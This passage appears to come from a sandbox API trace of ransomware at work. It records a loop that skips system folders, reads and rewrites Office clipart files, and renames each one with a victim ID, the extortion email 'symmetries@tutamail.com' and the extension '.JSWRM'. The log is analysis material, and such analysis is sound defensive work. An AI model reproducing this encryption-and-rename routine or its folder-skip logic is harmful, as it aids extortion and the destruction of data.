lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0087.821] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebd4c33, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xebd4c33, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xebd4c33, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa0b0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0200289.WMF", cAlternateFileName="")) returned 1 [0087.821] lstrcmpiW (lpString1="J0200289.WMF", lpString2=".") returned 1 [0087.821] lstrcmpiW (lpString1="J0200289.WMF", lpString2="..") returned 1 [0087.821] lstrcmpiW (lpString1="J0200289.WMF", lpString2="...") returned 1 [0087.821] lstrcmpiW (lpString1="J0200289.WMF", lpString2="windows") returned -1 [0087.821] lstrcmpiW (lpString1="J0200289.WMF", lpString2="recovery") returned -1 [0087.821] lstrcmpiW (lpString1="J0200289.WMF", lpString2="perflogs") returned -1 [0087.821] lstrcmpiW (lpString1="J0200289.WMF", lpString2="documents and settings") returned 1 [0087.821] lstrcmpiW (lpString1="J0200289.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.821] lstrcmpiW (lpString1="J0200289.WMF", lpString2="system volume information") returned -1 [0087.821] lstrcmpiW (lpString1="J0200289.WMF", lpString2="msocache") returned -1 [0087.821] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0087.822] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0200289.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.822] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0200289.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0200289.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0087.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0087.822] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0200289.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.822] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0200289.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0200289.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0087.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0087.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0087.822] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.822] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0087.822] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200289.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200289.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.822] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=41136) returned 1 [0087.822] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0b0) returned 0x24d210 [0087.822] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xa0b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xa0b0, lpOverlapped=0x0) returned 1 [0087.826] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.826] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xa0b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xa0b0, lpOverlapped=0x0) returned 1 [0087.827] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0087.827] CloseHandle (hObject=0x314) returned 1 [0087.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0087.828] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0087.828] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0087.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0087.828] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0087.828] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0087.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0087.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0087.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0087.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0087.828] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200289.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200289.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200289.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200289.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0087.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0087.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0087.829] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebd4c33, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xebd4c33, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xebd4c33, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4f08, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0200377.WMF", cAlternateFileName="")) returned 1 [0087.829] lstrcmpiW (lpString1="J0200377.WMF", lpString2=".") returned 1 [0087.829] lstrcmpiW (lpString1="J0200377.WMF", lpString2="..") returned 1 [0087.829] lstrcmpiW (lpString1="J0200377.WMF", lpString2="...") returned 1 [0087.829] lstrcmpiW (lpString1="J0200377.WMF", lpString2="windows") returned -1 [0087.829] lstrcmpiW (lpString1="J0200377.WMF", lpString2="recovery") returned -1 [0087.829] lstrcmpiW (lpString1="J0200377.WMF", lpString2="perflogs") returned -1 [0087.829] lstrcmpiW (lpString1="J0200377.WMF", lpString2="documents and settings") returned 1 [0087.829] lstrcmpiW (lpString1="J0200377.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.829] lstrcmpiW (lpString1="J0200377.WMF", lpString2="system volume information") returned -1 [0087.829] lstrcmpiW (lpString1="J0200377.WMF", lpString2="msocache") returned -1 [0087.829] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0087.829] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0200377.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.829] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0200377.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0200377.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0087.829] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0087.829] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0200377.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.829] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0200377.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0200377.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0087.829] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0087.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0087.829] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.829] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.829] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0087.829] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200377.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200377.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.830] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=20232) returned 1 [0087.830] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4f00) returned 0x24d210 [0087.831] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4f00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4f00, lpOverlapped=0x0) returned 1 [0087.846] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.846] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4f00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4f00, lpOverlapped=0x0) returned 1 [0087.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0087.846] CloseHandle (hObject=0x314) returned 1 [0087.847] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0087.847] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.847] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0087.847] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.847] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0087.847] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0087.847] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.847] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0087.847] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.847] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0087.847] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0087.847] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0087.847] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0087.847] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0087.847] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200377.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200377.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200377.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200377.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0087.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0087.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0087.848] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebd4c33, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xebd4c33, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xebd4c33, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5398, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0200383.WMF", cAlternateFileName="")) returned 1 [0087.848] lstrcmpiW (lpString1="J0200383.WMF", lpString2=".") returned 1 [0087.848] lstrcmpiW (lpString1="J0200383.WMF", lpString2="..") returned 1 [0087.848] lstrcmpiW (lpString1="J0200383.WMF", lpString2="...") returned 1 [0087.848] lstrcmpiW (lpString1="J0200383.WMF", lpString2="windows") returned -1 [0087.848] lstrcmpiW (lpString1="J0200383.WMF", lpString2="recovery") returned -1 [0087.848] lstrcmpiW (lpString1="J0200383.WMF", lpString2="perflogs") returned -1 [0087.848] lstrcmpiW (lpString1="J0200383.WMF", lpString2="documents and settings") returned 1 [0087.848] lstrcmpiW (lpString1="J0200383.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.848] lstrcmpiW (lpString1="J0200383.WMF", lpString2="system volume information") returned -1 [0087.848] lstrcmpiW (lpString1="J0200383.WMF", lpString2="msocache") returned -1 [0087.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0087.848] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0200383.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.848] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0200383.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0200383.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0087.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0087.848] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0200383.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.848] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0200383.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0200383.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0087.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0087.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0087.848] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.848] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.849] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0087.849] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200383.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200383.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.849] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=21400) returned 1 [0087.849] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.849] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5390) returned 0x24d210 [0087.849] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x5390, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x5390, lpOverlapped=0x0) returned 1 [0087.852] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.852] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x5390, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x5390, lpOverlapped=0x0) returned 1 [0087.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0087.853] CloseHandle (hObject=0x314) returned 1 [0087.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0087.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0087.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0087.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0087.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0087.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0087.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0087.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0087.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0087.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0087.853] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200383.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200383.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200383.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200383.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0087.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0087.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0087.854] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec210f4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xec210f4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xec210f4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x366e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0200467.WMF", cAlternateFileName="")) returned 1 [0087.854] lstrcmpiW (lpString1="J0200467.WMF", lpString2=".") returned 1 [0087.854] lstrcmpiW (lpString1="J0200467.WMF", lpString2="..") returned 1 [0087.854] lstrcmpiW (lpString1="J0200467.WMF", lpString2="...") returned 1 [0087.854] lstrcmpiW (lpString1="J0200467.WMF", lpString2="windows") returned -1 [0087.854] lstrcmpiW (lpString1="J0200467.WMF", lpString2="recovery") returned -1 [0087.854] lstrcmpiW (lpString1="J0200467.WMF", lpString2="perflogs") returned -1 [0087.854] lstrcmpiW (lpString1="J0200467.WMF", lpString2="documents and settings") returned 1 [0087.854] lstrcmpiW (lpString1="J0200467.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.854] lstrcmpiW (lpString1="J0200467.WMF", lpString2="system volume information") returned -1 [0087.854] lstrcmpiW (lpString1="J0200467.WMF", lpString2="msocache") returned -1 [0087.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0087.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0200467.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0200467.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0200467.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0087.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0087.854] WideCharToMultiByte (in: 